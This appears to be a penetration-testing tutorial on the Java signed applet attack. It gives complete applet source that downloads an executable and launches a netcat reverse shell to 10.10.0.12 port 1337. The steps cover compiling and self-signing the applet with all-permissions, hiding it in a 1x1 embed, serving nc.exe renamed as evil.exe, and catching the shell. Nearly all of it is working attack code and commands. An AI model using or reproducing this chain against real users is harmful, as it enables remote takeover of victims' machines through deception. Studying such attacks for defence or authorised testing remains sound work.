Java Signed Applet Attack
Java Signed Applet Attack is a Client Side exploit and is based on a human vulnerability as opposted to software vulnerability.
This attack affects targets with Java installed and enabled in their browsers. In this example we create a malicious Java applet which will execute code of our choice.
If user runs the Java applet, the Java software installed on victim´s machine will execute our payload.
This Java code below will download a given executable and execute it a temp directory on the target machine.
Java.java
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
import java.applet.*; import java.awt.*; import java.io.*; import java.net.URL; import java.util.*; import java.net.URL; /** * This Java applet will download a file and execute it. **/ public class Java extends Applet { private Object initialized = null; public Object isInitialized() { return initialized; } public void init() { Process f; try { String tmpdir = System.getProperty("java.io.tmpdir") + File.separator; String expath = tmpdir + "evil2.exe"; String download = ""; download = getParameter("1"); if (download.length() > 0) { // URL parameter URL url = new URL(download); // Get an input stream for reading InputStream in = url.openStream(); // Create a buffered input stream for efficency BufferedInputStream bufIn = new BufferedInputStream(in); File outputFile = new File(expath); OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile)); byte[] buffer = new byte[2048]; for (;;) { int nBytes = bufIn.read(buffer); if (nBytes <= 0) break; out.write(buffer, 0, nBytes); } out.flush(); out.close(); in.close(); f = Runtime.getRuntime().exec("cmd.exe /c " + expath + " 10.10.0.12 1337 -e cmd.exe"); } } catch(IOException e) { e.printStackTrace(); } /* ended here and commented out below for bypass */ catch (Exception exception) { exception.printStackTrace(); } } } |
Compile code with Java compiler and then sign applet.
|
1 2 |
/usr/lib/jvm/java-8-openjdk-i386/bin/javac -source 1.7 -target 1.7 Java.java |
|
1 2 3 4 5 6 7 8 9 |
echo "Permissions: all-permissions" > /root/manifest.txt /usr/lib/jvm/java-8-openjdk-i386/bin/jar cvf Java.jar Java.class /usr/lib/jvm/java-8-openjdk-i386/bin/keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123 /usr/lib/jvm/java-8-openjdk-i386/bin/jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet cp Java.class SignedJava.jar /var/www/html/ |
When the applet is ready, embed it in an HTML file and write to web root folder:
|
1 2 3 |
echo '<applet id="Java Secure" archive="SignedJava.jar" code="Java.class" width="1" height="1"></applet>' > /var/www/html/java.html |
Copy netcat to web root and rename it to evil.exe
|
1 2 |
cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe |
User browses to java.html and reveives a warning message popup, user ignore it and click “Run”.
Attacker captures the reverse shell with netcat; “nc -lnvp 1337”